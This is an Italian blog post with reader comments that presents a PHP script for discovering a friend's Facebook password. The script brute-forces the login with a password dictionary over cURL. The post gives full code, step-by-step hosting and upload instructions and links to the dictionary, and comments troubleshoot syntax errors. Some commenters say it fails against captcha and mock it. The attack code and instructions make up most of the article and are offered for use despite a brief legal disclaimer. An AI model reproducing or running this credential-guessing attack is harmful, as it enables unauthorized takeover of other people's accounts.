L'iscrizione al concorso termina fra:
-
Scoprire e trovare password di Facebook
Articolo letto 3449 volte dal 01 2nd, 2010 | Condividi
Ancora una volta siamo qui a parlare del social network piu famoso al mondo, facebook, questa volta con uno programma ( Script php ) per scoprire e trovare le password facebook di un vostro amico.
Secondo la legge Italiana rubare una password sia di facebook che di qualsiasi altro utente equivale ad un reato e per tanto è perseguibile per legge.
Quindi a meno che non vogliate fare uno scherzo ad un vostro amico, e siete sicuri di non beccarvi una inutile denuncia penale, ecco di seguito lo script completo:
<?
################################
# Scoprire password di facebook
# Autore ignoto
# modded: by KinG-LioN http://www.kinglion.it
################################
set_time_limit(0);
$username =”kinglion@kinglion.it”; // Email vittima
$dictionary =”dizionario.txt”; // Dizionariofunction kontrol($kullaniciadi,$sifre){
$useragent = “Opera/9.21 (Windows NT 5.1; U; tr)”;
$data = “email=$kullaniciadi&pass=$sifre&login=Login” ;
$ch = curl_init(‘[url]https://login.facebook.com/login.php?m&next=http://m.facebook.com/home.php’[/url]);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEFILE, ‘cookie.txt’);
curl_setopt($ch, CURLOPT_COOKIEJAR, ‘cookie.txt’);
$source=curl_exec ($ch);
curl_close ($ch);
if(eregi(“Home</title>”,$source)){return true;} else {return false;}}
if(!is_file($dictionary)){echo “$dictionary is not file”;exit;}
$lines=file($dictionary);
echo “Attack Starting..
“;
sleep(10);
echo “Attacco iniziato, attendi qualche minuto..
“;
foreach($lines as $line){
$line=str_replace(“\r”,”",$line);
$line=str_replace(“\n”,”",$line);
if(kontrol($username,$line)){echo “<font face=tahoma color=green>[+]</font><font face=tahoma> username:$username , password:$line – P
assword found : $line</font>
“;$fp=fopen(‘cookie.txt’,'w’);fwrite($fp,”);exit;}
else{echo “<font face=tahoma color=brown>[-]</font><font face=tahoma> username:$username , password:$line – Password non trovata :
$line</font>
“;}
}
?>
Per tutti coloro che sono meno esperti, ecco che vi spiego come usare lo script.
Come prima cosa avete bisogno di uno spazio web, ad esempio potete registrarne uno gratuito su Altervista.org del tipo kinglion.altervista.org.
Il secondo passo da fare è quello di copiare il codice e salvarlo con estenzione .php
Apriamo il blocco notes scriviamo il codice, poi facciamo file, salva con nome, nel menu a discesa selezioniamo tutti i file e salviamo come kinglion.php
Il terzo passo è di scaricare il dizionario da qua.
Uppare sia il file kinglion.php che il dizionario e lanciare lo script da URL.
32 commenti »
RSS feed dei commenti a questo articolo. TrackBack URL
Lascia un commento
il dizionario scaricato non ha il formato .txt ma .j9d
Si biusogna aprirlo con winrar ( http://www.winrar.it/prelievo.php ) ed estrarne il contenuto
non lo apre…. puoi upparlo in txt direttamente?
ok fatto, ora al primo link ( quello nell’articolo ) puoi scaricare un file ZIP contenente il dizionario in formato txt normale
non so come usare lo script (non sono un esperto), mi puoi dare una mano?
ho creato un mio spazio web su altervista, creato il file kinglion.php e scaricato il dizionario da megaupload.
ora come faccio a “Uppare sia il file kinglion.php che il dizionario e lanciare lo script da URL”?
poi cosa dovrebbe succedere?
scusa la mia ignoranza, grazie 1000!
la variabile alla terza riga come vedi ( $dictionary =”dizionario.txt”; ) richiama un file dizionario.txt
Inserisci tale file chiamato dizionario.txt nella stessa cartella dove risiede lo script e lancia il percorso tipo: tuosito.altervista.org/SCRIPT.PHP ed attendi i risultati.
Se da qualche errore è probabile che devi cambiare e riscrivere a mano tutti gli “ e gli ‘ dello script xke wordpress usa una codifica diversa
sarebbe un brute force..
esattamente un brute force per facebook
è comunque inutile, altervista ha un blocco automatico contro i brute…
e poi su altervista…
/*
non funziona …
ce un limite di 60 secondi se non ricordo male … bisogna fare in altro modo per eseguire lo script all’infinito
*/
da un errore di sintassi…non funziona…come mai=?
mi da
Parse error: syntax error, unexpected ‘@’ in [...]/kinglion.php on line 8
davvero strano, da un erroe sulla linea 8 ossia $username =”kinglion@kinglion.it”; // Email vittima in pratica dice che trova una @ in piu… avete modificato come vi ho detto tutte le ” ?
xke a me gira benissimo su spazio aruba
King ma che guide butti giù… Un dictionary attack per fb…
xke matteo non te gusta?
anche provando a cambiare tutte le ” non funziona..strano..
a me da questo:
Parse error: syntax error, unexpected ‘[‘ in …/mirkixeddu.php on line 14
ssiis anche a me una volta modificato tutte le ” mi da lo stesso tuo errore…
Ciao KinG-LioN ho scaricato lo script,volevo farlo partire da locale con easyphp ma non và,suppongo che non si possa giusto?Ma comuqnue agli altri funziona???!Un saluto…
Secondo me è un attacco pessimo!
Basta avere un carattere speciale nella password o un numero e l’attacco fallirà!
Se la password da scoprire non è contenuta nel dizionario, l’attacco non funziona. In pratica può essere utile solo per il 5% delle persone, che mette password molto banali.
errore linea 42 questo il codice fino alla fine dovè l’errore??
else{echo “[-] username:$username , password:$line – P
assword non trovata : $line
“}
}
?>
posso sostituire il file dictionary.txt con un altro, stesso nome, ma più dettagliato?
p.s. non parte niente… mi visualizza il php come se fosse un file txt…
$username =”kinglion@kinglion.it”; come potrebbe mai funzionare cosi ? bho.. provate
$username =\”kinglion@kinglion.it\”;
x la cronaca:
per far funzionare lo script bisogna sostituire:
i doppi apici inclinati a destra : ”
i doppi apici inclinati a sinistra : “
con i doppi apici standard : ”
In seguito sostituire:
i singoli apici inclinati a sinistra: ‘
i singoli apici inclinati a destra: ’
con il singolo apice standard: ‘
In questo modo non dovrebbe + dare problemi di sintassi.
Cmq bisognerebbe trovare un dizionario + completo per un serio brute force. Sapete dove si può scaricare???
e cmq non riconosce la password anche se è presente nel dizionario! io ho provato con la mia mail e la mia password e non l’ha riconosciuta!
ma ovvio facebook usa un sistema che blocca questi attacchi vero king?
allora a sto punto attendo esiti
diversi…salute a tutti
Si dexter, facebook ora usa un sistema captcha per evitare questi attacchi.
Ci sono molti errori nel codice. Non so se lo hai fatto appositamente per i meno esperti e comunque a quanto pare, le virgolette ” vengono sostituite da ” che sono completamente diverse infatti appare l’errore in php. Penso che sia per colpa dei css del cms. Ciao
se vi da il problema
Parse error: syntax error, unexpected ‘@’ in [...]/kinglion.php on line 8
è perchè dovete sostituire gli apici di wordpress ” in quelli normali ”
ciao
Tutto ciò è uno scherzo vero..?
Sì, non può che essere uno scherzo, fra l’altro di pessimo gusto. Non si può fare informatica in modo così dozzinale propinando queste emerite stronzate ai lamer King. E fra l’altro, che spazio web e spazio web? Lo stesso identico attacco lo fai pure in locale, con uno script Bash che richiama cURL e un qualsiasi dizionario in txt. Già di suo è una cosa altamente da coglioni fare una cosa del genere. È doppiamente da coglioni considerando che la probabilità di successo, come qualcuno giustamente diceva, è intorno al 5% se non inferiore. Triplamente da coglioni farlo con uno script PHP da uno spazio web, con il rischio di generare un puttanaio di traffico e vedersi, nella migliore delle ipotesi, il proprio account web sospeso.